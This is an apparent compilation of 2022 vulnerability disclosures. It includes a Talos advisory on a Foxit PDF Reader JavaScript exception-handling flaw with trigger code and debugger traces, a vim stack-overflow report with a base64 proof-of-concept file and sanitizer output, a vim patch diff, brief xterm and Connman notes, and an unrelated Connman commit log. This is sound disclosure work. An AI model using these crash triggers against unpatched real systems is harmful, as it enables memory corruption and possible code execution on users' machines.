A memory corruption vulnerability exists in the JavaScript engine of Foxit Software’s PDF Reader, version 11.1.0.52543. A specially-crafted PDF document can trigger an exception which is improperly handled, leaving the engine in an invalid state, which can lead to memory corruption and arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially-crafted, malicious site if the browser plugin extension is enabled.

**Summary**

A memory corruption vulnerability exists in the JavaScript engine of Foxit Software’s PDF Reader, version 11.1.0.52543. A specially-crafted PDF document can trigger an exception which is improperly handled, leaving the engine in an invalid state, which can lead to memory corruption and arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially-crafted, malicious site if the browser plugin extension is enabled.

**Tested Versions**

Foxit Reader 11.1.0.52543

**Product URLs**

Foxit Reader - https://www.foxitsoftware.com/pdf-reader/

**CVSSv3 Score**

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-460 - Improper Cleanup on Thrown Exception

**Details**

Foxit PDF Reader is one of the most popular PDF document readers and has a large user base. It aims to have feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.

Javascript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exsists a memory corruption vulnerability in the way Foxit’s Javascript bindings handle certain exceptions. More specifically , method getPageNthWordQuads can cause a C++ exception to be thrown which, under usual circumstances, would terminate further javascript execution. However, when such an exception happens during nested execution, such as during event handler or from a different function callback, exceptions can be caught while the rest of the code continues to execute. Thrown exception leaves javascript engine runtime in an inconsistent state, which can then lead to further memory corruption. To illustrate this issue, the following Javascript code can be used:

    function main() { 
     app.activeDocs[0].getField('txt3')['borderStyle'] = {toString:f1}; 
    }
    
    function f1() {
    app.activeDocs[0].getField('txt3').buttonSetCaption({toString:f2}); 
    }
    
    function f2() { 
    app.activeDocs[0].getPageNthWordQuads(0,-1);
    }
    

Above code uses a couple of properties and functions of txt3 field to illustrate the point and make the crash context interesting, but the same vulnerability can be triggered in many ways. First, borderStyle is assigned a new value with an object whose toString points to f1. Since borderStyle expects a string, f1 is immediatelly executed. Inside f1 , buttonSetCaption is invoked in a similar manner, with an object whose toString points to function f2. Function buttonSetCaption similarly expects a string value, so f2 is immediately executed. Inside f2 , method getPageNthWordQuads is called with a second parameter being a malformed value. Second parameter is supposed to be an index of a word on a page and is supposed to be a positive value.

To see what happens, we can follow in the debugger, starting from the execution of getPageNthWordQuads:

    00 004fdae0 031e3cb2     FoxitPDFReader!safe_vsnprintf+0xe33e98
    01 004fdb34 0357371b     FoxitPDFReader!safe_vsnprintf+0xe06012
    02 004fdb7c 03739129     FoxitPDFReader!FXJSE_GetClass+0x2cb
    03 004fdbd0 037388bf     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1c5339
    04 004fdc64 03738b81     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1c4acf
    05 004fdcac 03738a1b     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1c4d91
    06 004fdcc8 038dfd37     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1c4c2b
    07 004fdce8 0386e670     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x36bf47
    08 004fdd2c 038689bc     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x2fa880
    09 004fdd54 0386c1ff     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x2f4bcc
    0a 004fdd68 0386c01b     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x2f840f
    0b 004fdd94 035aa406     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x2f822b
    0c 004fde58 035a9ee7     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x36616
    0d 004fded8 036244d9     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x360f7
    0e 004fdf48 036276d6     FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb06e9
    0f 004fdf7c 035d36bc     FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb38e6
    10 004fdfa4 0359d317     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x5f8cc
    11 004fe020 03573d80     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x29527
    12 004fe05c 0325694a     FoxitPDFReader!CFXJSE_Arguments::GetUTF8String+0x60
    13 004fe0b8 03225412     FoxitPDFReader!safe_vsnprintf+0xe78caa
    14 004fe10c 0357371b     FoxitPDFReader!safe_vsnprintf+0xe47772
    15 004fe154 03739129     FoxitPDFReader!FXJSE_GetClass+0x2cb
    16 004fe1a8 037388bf     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1c5339
    17 004fe23c 03738b81     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1c4acf
    18 004fe284 03738a1b     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1c4d91
    19 004fe2a0 038dfd37     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1c4c2b
    1a 004fe2c0 0386e670     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x36bf47
    1b 004fe300 038689bc     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x2fa880
    1c 004fe328 0386c1ff     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x2f4bcc
    1d 004fe33c 0386c01b     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x2f840f
    1e 004fe368 035aa406     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x2f822b
    1f 004fe42c 035a9ee7     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x36616
    20 004fe4ac 036244d9     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x360f7
    21 004fe51c 036276d6     FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb06e9
    22 004fe550 035d36bc     FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb38e6
    23 004fe578 0359d317     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x5f8cc
    24 004fe5f4 0356f768     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x29527
    25 004fe654 03240ffe     FoxitPDFReader!FXJSE_Value_ToUTF8String+0x88
    26 004fe6d0 032556a8     FoxitPDFReader!safe_vsnprintf+0xe6335e
    27 004fe6fc 0322bf51     FoxitPDFReader!safe_vsnprintf+0xe77a08
    28 004fe750 03573a02     FoxitPDFReader!safe_vsnprintf+0xe4e2b1
    29 004fe78c 035d1942     FoxitPDFReader!FXJSE_GetClass+0x5b2
    2a 004fe7e4 035e9163     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x5db52
    2b 004fe894 035e8ee3     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x75373
    2c 004fe8d8 035e8ace     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x750f3
    2d 004fe910 03854604     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x74cde
    2e 004fe990 0384fe49     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x2e0814
    2f 004fea08 038dfc57     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x2dc059
    30 004fea28 0392b2ea     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x36be67
    31 004fea64 0386e670     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3b74fa
    32 004fea8c 0386e670     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x2fa880
    33 004feab8 0386c1ff     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x2fa880
    34 004feacc 0386c01b     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x2f840f
    0:000> u
    FoxitPDFReader!safe_vsnprintf+0xe33e98:
    03211b38 3bc6            cmp     eax,esi
    03211b3a 0f8e30020000    jle     FoxitPDFReader!safe_vsnprintf+0xe340d0 (03211d70)
    03211b40 0f8651020000    jbe     FoxitPDFReader!safe_vsnprintf+0xe340f7 (03211d97)
    0:000> ?eax
    Evaluate expression: 0 = 00000000
    0:000> ?esi
    Evaluate expression: -2147483648 = 80000000
    

Note in the above call stack a particular frame FoxitPDFReader!FXJSE_Value_ToUTF8String+0x88. Breakpoint is on a cmp instruction comparing values in eax and esi. Value in esi is derived from the negative value supplied to getPageNthWordQuads. First jump will fall through, but second one is followed to land at:

    Breakpoint 2 hit
    eax=00000000 ebx=1d004a68 ecx=00000000 edx=3c70ee60 esi=80000000 edi=00000000
    eip=03211d97 esp=004fd9b0 ebp=004fdae0 iopl=0         ov up ei ng nz na pe cy
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000a87
    FoxitPDFReader!safe_vsnprintf+0xe340f7:
    03211d97 e88438ffff      call    FoxitPDFReader!safe_vsnprintf+0xe27980 (03205620)
    0:000> u
    FoxitPDFReader!safe_vsnprintf+0xe340f7:
    03211d97 e88438ffff      call    FoxitPDFReader!safe_vsnprintf+0xe27980 (03205620)
    03211d9c cc              int     3
    03211d9d cc              int     3
    03211d9e cc              int     3
    03211d9f cc              int     3
    03211da0 55              push    ebp
    03211da1 8bec            mov     ebp,esp
    03211da3 6aff            push    0FFFFFFFFh
    

We can note that the above call instruction is followed by breakpoint instructions, indicating that it never returns. This is indicative of an exception being raised.

    0:000> u
    FoxitPDFReader!safe_vsnprintf+0xe27980:
    03205620 683007b605      push    offset FoxitPDFReader!google::LogMessage::kMaxLogMessageLen+0xa36ab4 (05b60730)
    03205625 e8d0656c01      call    FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x381a0a (048cbbfa)
    0320562a cc              int     3
    0320562b cc              int     3
    0320562c cc              int     3
    0320562d cc              int     3
    0320562e cc              int     3
    0320562f cc              int     3
    0:000> ba 05b60730
    0:000> da 05b60730
    05b60730  "invalid vector<T> subscript"
    

Indeed, an exception with message invalid vector<T> subscript is about to be thrown. Continuing execution through all of the exception chain reveals mostly empty handlers. To see where code actually resumes execution, we can break at NtContinue:

    Breakpoint 9 hit
    eax=004fc8e0 ebx=004fe648 ecx=00500000 edx=004ca000 esi=004fe648 edi=004fcdf8
    eip=77823af5 esp=004fc818 ebp=004fcbbc iopl=0         nv up ei pl zr na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
    ntdll!RtlUnwind+0x145:
    77823af5 e806720000      call    ntdll!NtContinue (7782ad00)
    0:000> t
    eax=004fc8e0 ebx=004fe648 ecx=00500000 edx=004ca000 esi=004fe648 edi=004fcdf8
    eip=7782ad00 esp=004fc814 ebp=004fcbbc iopl=0         nv up ei pl zr na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
    ntdll!NtContinue:
    7782ad00 b843000000      mov     eax,43h
    0:000> t
    eax=00000043 ebx=004fe648 ecx=00500000 edx=004ca000 esi=004fe648 edi=004fcdf8
    eip=7782ad05 esp=004fc814 ebp=004fcbbc iopl=0         nv up ei pl zr na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
    ntdll!NtContinue+0x5:
    7782ad05 ba60f18377      mov     edx,offset ntdll!Wow64SystemServiceCall (7783f160)
    0:000> 
    eax=00000043 ebx=004fe648 ecx=00500000 edx=7783f160 esi=004fe648 edi=004fcdf8
    eip=7782ad0a esp=004fc814 ebp=004fcbbc iopl=0         nv up ei pl zr na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
    ntdll!NtContinue+0xa:
    7782ad0a ffd2            call    edx {ntdll!Wow64SystemServiceCall (7783f160)}
    0:000> 
    eax=00000043 ebx=004fe648 ecx=00500000 edx=7783f160 esi=004fe648 edi=004fcdf8
    eip=7783f160 esp=004fc810 ebp=004fcbbc iopl=0         nv up ei pl zr na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
    ntdll!Wow64SystemServiceCall:
    7783f160 ff2528b28d77    jmp     dword ptr [ntdll!Wow64Transition (778db228)] ds:002b:778db228=777b7000
    0:000> 
    eax=00000043 ebx=004fe648 ecx=00500000 edx=7783f160 esi=004fe648 edi=004fcdf8
    eip=777b7000 esp=004fc810 ebp=004fcbbc iopl=0         nv up ei pl zr na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
    777b7000 ea09707b773300  jmp     0033:777B7009
    0:000> 
    eax=00000000 ebx=00000000 ecx=00000000 edx=00000000 esi=00000000 edi=00000000
    eip=04988abc esp=004fcbd4 ebp=004fcbe8 iopl=0         nv up ei ng nz na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
    FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x43e8cc:
    04988abc 8b450c          mov     eax,dword ptr [ebp+0Ch] ss:002b:004fcbf4=004fcdf8
    0:000> 
    

After exception unwinding, execution is back in Foxit code. Above instruction at FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x43e8cc is simply a return point which restores execution, and it should return to a point in code outside the caught exception. And indeed:

    0:000> 
    Breakpoint 11 hit
    eax=0356f7df ebx=004fe648 ecx=0498f630 edx=006d0000 esi=060948e0 edi=004fe648
    eip=0356f7df esp=004fe604 ebp=004fe654 iopl=0         nv up ei pl nz ac po nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000212
    FoxitPDFReader!FXJSE_Value_ToUTF8String+0xff:
    0356f7df 32c0            xor     al,al
    0:000> k
     # ChildEBP RetAddr      
    WARNING: Stack unwind information not available. Following frames may be wrong.
    00 004fe654 03240ffe     FoxitPDFReader!FXJSE_Value_ToUTF8String+0xff
    01 004fe6d0 032556a8     FoxitPDFReader!safe_vsnprintf+0xe6335e
    02 004fe6fc 0322bf51     FoxitPDFReader!safe_vsnprintf+0xe77a08
    03 004fe750 03573a02     FoxitPDFReader!safe_vsnprintf+0xe4e2b1
    04 004fe78c 035d1942     FoxitPDFReader!FXJSE_GetClass+0x5b2
    05 004fe7e4 035e9163     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x5db52
    06 004fe894 035e8ee3     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x75373
    07 004fe8d8 035e8ace     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x750f3
    

From the above call stack, we can see that execution resumes inside FXJSE_Value_ToUTF8String function. A call to ToUTF8String javascript binding is performed when our javascript code invokes buttonSetCaption. During its execution, a redefined toString function f2 is invoked. Since this exception is caught in FXJSE_Value_ToUTF8String, further javascript execution continues. Since previous fragments weren’t executed to completion, this left the engine in an undefined state and quickly leads to memory corruption:

    0:000> g
    (2e0c.2378): Access violation - code c0000005 (first/second chance not available)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=004c0000 ebx=3c789ff8 ecx=3c884ff0 edx=3c889f28 esi=004fdea4 edi=3c713748
    eip=03606f8c esp=004fe130 ebp=004fe13c iopl=0         nv up ei pl nz na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
    FoxitPDFReader!CFXJSE_Arguments::GetValue+0x9319c:
    03606f8c 8b8884000000    mov     ecx,dword ptr [eax+84h] ds:002b:004c0084=????????
    

Above piece of code is part of V8’s deoptimizer, which would perform various operations on the javascript code being executed. Due to memory corruption, a stack pointer ends up being masked and used:

    03606f84 8bc6         mov     eax, esi
    03606f86 250000fcff   and     eax, 0FFFC0000h
    03606f8b 56           push    esi
    03606f8c 8b8884000000 mov     ecx, dword ptr [eax+84h]
    03606f92 e8b9451f00   call    FoxitPDFReader!CFXJSE_Arguments::GetValue+0x287760 (037fb550)
    

This ultimately leads to a crash. Since context and time of thrown exception can be controlled, as well as javascript code that gets executed afterwards, other means of memory corruption can be achieved. Above crash is just one example. With careful memory layout manipulation, this can lead to arbitrary code execution.

**Timeline**

2022-01-11 - Vendor disclosure  
2022-01-31 - Public Release  

Discovered by Aleksandar Nikolic of Cisco Talos.

CVE-2022-22150: TALOS-2022-1439 || Cisco Talos Intelligence Group

xterm through Patch 370, when Sixel support is enabled, allows attackers to trigger a buffer overflow in set_sixel in graphics_sixel.c via crafted text.

CVE-2022-24130: XTERM - Change Log

Use After Free in GitHub repository vim/vim prior to 8.2.

@@ -3687,6 +3687,7 @@ ex\_substitute(exarg\_T \*eap) int save\_do\_all; // remember user specified 'g' flag int save\_do\_ask; // remember user specified 'c' flag char\_u \*pat = NULL, \*sub = NULL; // init for GCC char\_u \*sub\_copy = NULL; int delimiter; int sublen; int got\_quit = FALSE; @@ -3980,11 +3981,20 @@ ex\_substitute(exarg\_T \*eap) sub\_firstline = NULL;  
/\* \* ~ in the substitute pattern is replaced with the old pattern. \* We do it here once to avoid it to be replaced over and over again. \* But don't do it when it starts with "\\=", then it's an expression. \* If the substitute pattern starts with "\\=" then it's an expression. \* Make a copy, a recursive function may free it. \* Otherwise, '~' in the substitute pattern is replaced with the old \* pattern. We do it here once to avoid it to be replaced over and over \* again. \*/ if (!(sub\[0\] == '\\\\' && sub\[1\] == '\=')) if (sub\[0\] == '\\\\' && sub\[1\] == '\=') { sub = vim\_strsave(sub); if (sub == NULL) return; sub\_copy = sub; } else sub = regtilde(sub, magic\_isset());  
/\* @@ -4790,6 +4800,7 @@ ex\_substitute(exarg\_T \*eap) #endif  
vim\_regfree(regmatch.regprog); vim\_free(sub\_copy);  
// Restore the flag values, they can be used for ":&&". subflags.do\_all = save\_do\_all;

CVE-2022-0413: patch 8.2.4253: using freed memory when substitute with function call · vim/vim@37f4795

Stack-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.

**Description**

Stack overflow occurs in spellsuggest.c.

commit : 44db8213d38c39877d2148eff6a72f4beccfb94e

**Proof of Concept**

    $ echo -ne "bm9ybRZzMDAwRzAw/TAwMDAwMDAwMDAwMApzaWwwbm9ybS4udnpHLi4uLi4uLi4uLi4uLi4uLnZ2
    ekcwICAgICB2IHo9" | base64 -d > minimized_poc
    
    # Valgrind
    $ ./vg-in-place -s ../vim-valgrind/src/vim -u NONE -i NONE -n -X -Z -e -m -s -S minimized_poc -c ":qa!"
    ==596658== Memcheck, a memory error detector
    ==596658== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
    ==596658== Using Valgrind-3.19.0.GIT and LibVEX; rerun with -h for copyright info
    ==596658== Command: ../vim-valgrind/src/vim -u NONE -i NONE -n -X -Z -e -m -s -S minimized_poc -c :qa!
    ==596658==
    ==596658== Invalid read of size 4
    ==596658==    at 0x32FCBD: add_suggestion (spellsuggest.c:3530)
    ==596658==    by 0x32A8D1: suggest_trie_walk (spellsuggest.c:1639)
    ==596658==    by 0x1FFFFFFFF: ???
    ==596658==    by 0x10000000000FF00: ???
    ==596658==  Address 0x6000000008 is not stack'd, malloc'd or (recently) free'd
    ==596658==
    ==596658==
    ==596658== Process terminating with default action of signal 11 (SIGSEGV): dumping core
    ==596658==    at 0x4A2255B: kill (syscall-template.S:78)
    ==596658==    by 0x28FE98: may_core_dump (os_unix.c:3510)
    ==596658==    by 0x28FE4C: mch_exit (os_unix.c:3476)
    ==596658==    by 0x40A260: getout (main.c:1721)
    ==596658==    by 0x25302D: preserve_exit (misc1.c:2194)
    ==596658==    by 0x28E408: deathtrap (os_unix.c:1156)
    ==596658==    by 0x4A2220F: ??? (in /usr/lib/x86_64-linux-gnu/libc-2.31.so)
    ==596658==    by 0x32FCBC: add_suggestion (spellsuggest.c:3530)
    ==596658==    by 0x32A8D1: suggest_trie_walk (spellsuggest.c:1639)
    ==596658==    by 0x1FFFFFFFF: ???
    ==596658==    by 0x10000000000FF00: ???
    ==596658==
    ==596658== HEAP SUMMARY:
    ==596658==     in use at exit: 114,315 bytes in 593 blocks
    ==596658==   total heap usage: 1,864 allocs, 1,271 frees, 1,057,411 bytes allocated
    ==596658==
    ==596658== LEAK SUMMARY:
    ==596658==    definitely lost: 1,679 bytes in 6 blocks
    ==596658==    indirectly lost: 8 bytes in 3 blocks
    ==596658==      possibly lost: 268 bytes in 1 blocks
    ==596658==    still reachable: 112,360 bytes in 583 blocks
    ==596658==         suppressed: 0 bytes in 0 blocks
    ==596658== Rerun with --leak-check=full to see details of leaked memory
    ==596658==
    ==596658== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
    ==596658==
    ==596658== 1 errors in context 1 of 1:
    ==596658== Invalid read of size 4
    ==596658==    at 0x32FCBD: add_suggestion (spellsuggest.c:3530)
    ==596658==    by 0x32A8D1: suggest_trie_walk (spellsuggest.c:1639)
    ==596658==    by 0x1FFFFFFFF: ???
    ==596658==    by 0x10000000000FF00: ???
    ==596658==  Address 0x6000000008 is not stack'd, malloc'd or (recently) free'd
    ==596658==
    ==596658== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
    Segmentation fault
    
    # ASAN
    $ ~/fuzzing/vim-asan/src/vim -u NONE -i NONE -n -X -Z -e -m -s -S ~/fuzzing/valgrind/minimized_poc ":qa!"
    =================================================================
    ==250851==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffff6b20 at pc 0x000000496710 bp 0x7fffffff3d10 sp 0x7fffffff34d8
    WRITE of size 32 at 0x7fffffff6b20 thread T0
        #0 0x49670f in __asan_memcpy (/home/alkyne/fuzzing/vim-asan/src/vim+0x49670f)
        #1 0xb08866 in go_deeper /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:2664:24
        #2 0xb08866 in suggest_trie_walk /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:1766:4
        #3 0xafa3e1 in suggest_try_change /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:1199:2
        #4 0xafa3e1 in spell_suggest_intern /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:995:5
        #5 0xafa3e1 in spell_find_suggest /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:870:6
        #6 0xaf6ffd in spell_suggest /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:545:5
        #7 0x894d7b in nv_zet /home/alkyne/fuzzing/vim-asan/src/normal.c:3398:7
        #8 0x864da8 in normal_cmd /home/alkyne/fuzzing/vim-asan/src/normal.c:1238:5
        #9 0x6a1a76 in exec_normal /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c
        #10 0x6a0bb1 in exec_normal_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:8592:5
        #11 0x6a0bb1 in ex_normal /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:8510:6
        #12 0x67e82c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
        #13 0x67e82c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
        #14 0xa71d9d in do_source /home/alkyne/fuzzing/vim-asan/src/scriptfile.c:1512:5
        #15 0xa7042d in cmd_source /home/alkyne/fuzzing/vim-asan/src/scriptfile.c:1098:14
        #16 0xa7042d in ex_source /home/alkyne/fuzzing/vim-asan/src/scriptfile.c:1124:2
        #17 0x67e82c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
        #18 0x67e82c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
        #19 0xd97b27 in exe_commands /home/alkyne/fuzzing/vim-asan/src/main.c:3091:2
        #20 0xd97b27 in vim_main2 /home/alkyne/fuzzing/vim-asan/src/main.c:774:2
        #21 0xd95139 in main /home/alkyne/fuzzing/vim-asan/src/main.c:426:12
        #22 0x7ffff7c260b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #23 0x41eacd in _start (/home/alkyne/fuzzing/vim-asan/src/vim+0x41eacd)
    
    Address 0x7fffffff6b20 is located in stack of thread T0 at offset 11776 in frame
        #0 0xb01cbf in suggest_trie_walk /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:1247
    
      This frame has 11 object(s):
        [32, 152) 'stack.i.i.i' (line 4307)
        [192, 200) 'p.i.i.i' (line 4316)
        [224, 1240) 'wbadword.i.i.i' (line 4317)
        [1376, 2392) 'wgoodword.i.i.i' (line 4318)
        [2528, 2648) 'stack.i.i' (line 4132)
        [2688, 2942) 'theword.i' (line 3169)
        [3008, 3262) 'cword.i' (line 3267)
        [3328, 3582) 'tword' (line 1248)
        [3648, 11776) 'stack' (line 1249) <== Memory access at offset 11776 overflows this variable
        [12032, 12794) 'preword' (line 1250)
        [12928, 13182) 'compflags' (line 1255)
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/alkyne/fuzzing/vim-asan/src/vim+0x49670f) in __asan_memcpy
    Shadow bytes around the buggy address:
      0x10007fff6d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x10007fff6d60: 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
      0x10007fff6d70: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
      0x10007fff6d80: f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6d90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6da0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6db0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==250851==ABORTING
    

**Impact**

Stack bof may lead to exploit the program.

CVE-2022-0408: Stack-based Buffer Overflow in vim

An issue was discovered in the DNS proxy in Connman through 1.40. The TCP server reply implementation has an infinite loop if no data is received.

AgeCommit message (Expand)AuthorFilesLines 12 dayswispr: Simplify the IP version checkHEADmasterDaniel Wagner1\-5/+1 12 dayswispr: Fix context refcounting in wispr\_portal\_request\_portal()Daniel Wagner1\-5/+5 12 daysservice: Track online check for IPv4 and IPv6 separatelyDaniel Wagner1\-12/+27 2022-08-28ipconfig: Don't add invalid gateway routesDaniel Wagner1\-1/+1 2022-08-28wisrp: Handle wispr\_portal\_detect failuresDaniel Wagner1\-24/+32 2022-08-28resolver: Add path to resolv.conf to config optionsJakub Jirutka3\-7/+48 2022-08-01AUTHORS: Mention Nathan's contributionsDaniel Wagner1\-0/+1 2022-08-01gweb: Fix OOB write in received\_data()Nathan Crandall1\-1/+1 2022-08-01wispr: Update portal context referencesDaniel Wagner1\-12/+22 2022-08-01wispr: Add reference counter to portal contextDaniel Wagner1\-10/+42 2022-08-01wispr: Ignore NULL proxyDaniel Wagner1\-1/+1 2022-08-01wispr: Rename wispr\_portal\_list to wispr\_portal\_hashDaniel Wagner1\-11/+11 2022-05-25wispr: Prevent use-after-free from \_\_connman\_wispr\_stop()Seung-Woo Kim1\-11/+5 2022-05-25doc: Add note SingleConnectedTechnology can't be used with VPNDaniel Wagner1\-1/+2 2022-05-16service: Add "Ethernet" property for VPN into n.c.Manager GetServicesJakub Jirutka1\-1/+1 2022-05-16clock: fix time update transition auto->manualRyan Smith1\-6/+3 2022-04-14wispr: Fix online check when using WPAD/PACRyan Smith1\-6/+30 2022-04-14dhcp: Set proxy properly when applying DHCP leaseRyan Smith1\-2/+1 2022-04-14gdhcp: fix server address byte orderRyan Smith1\-1/+1 2022-04-14iwd: Fix connection with invalid passphrase formatEmmanuel VAUTRIN1\-1/+3 2022-04-08AUTHORS: Mention Daniel's contributionsDaniel Wagner1\-0/+1 2022-04-08vpn: Replace hardcoded paths with RUNSTATEDIRDaniel Linjama2\-3/+3 2022-04-08build: Support configurable run dir with RUNSTATEDIRDaniel Linjama2\-0/+3 2022-04-08ofono: Do not change regdom when it follows timezoneJussi Laakkonen1\-0/+5 2022-04-08timezone: Change regdom along timezone, use localtime configJussi Laakkonen1\-5/+100 2022-04-08main: Add RegdomFollowsTimezone option for regdom changesJussi Laakkonen2\-0/+19 2022-04-08main: Add path to localtime to config options.Jussi Laakkonen2\-0/+22 2022-04-08timeserver: include the reason why a timeserver sync is requestedNicky Geerts4\-7/+35 2022-03-07timeserver: refresh the nameservers before each lookupNicky Geerts1\-41/+46 2022-03-04iwd: Forget network on service removalEmmanuel VAUTRIN5\-0/+58 2022-03-04dnsproxy: add standalone test version of dnsproxy and a test script for itMatthias Gerstner4\-1/+284 2022-02-27service: Check if hidden service has a pending request on agentJussi Laakkonen1\-1/+4 2022-02-27agent: Add support to check for active pending requestsJussi Laakkonen4\-0/+39 2022-02-27AUTHORS: Mention Sebastian's contributionsDaniel Wagner1\-0/+1 2022-02-27vpn/vpn-polkit.policy: Replace unsupported "auth\_\*\_keep\_session" by "auth\_\*\_k...Sebastian Pipping1\-2/+2 2022-02-27iwd: Fix disabling tethering not working for brcmfmacJonathan Liu1\-5/+4 2022-02-27main: Set default online check URL also when no config providedDaniel Wagner1\-2/+8 